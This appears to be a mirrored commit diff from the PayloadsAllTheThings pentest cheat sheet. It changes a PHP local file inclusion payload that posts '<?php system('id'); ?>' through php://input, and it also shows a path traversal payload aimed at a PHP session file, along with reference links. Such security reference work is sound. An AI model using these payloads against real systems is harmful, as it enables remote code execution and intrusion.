mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-30 15:15:04 +00:00
commit
0309a2efbd
@ -186,7 +186,7 @@ Specify your payload in the POST parameters
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=php://input
|
http://example.com/index.php?page=php://input
|
||||||
POST DATA: <? system('id'); ?>
|
POST DATA: <?php system('id'); ?>
|
||||||
```
|
```
|
||||||
|
|
||||||
### Wrapper phar://
|
### Wrapper phar://
|
||||||
@ -340,4 +340,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
|
|||||||
* [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379)
|
* [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379)
|
||||||
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
|
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
|
||||||
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
|
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
|
||||||
* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
|
* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
|
||||||
|
Loading…
Reference in New Issue
Block a user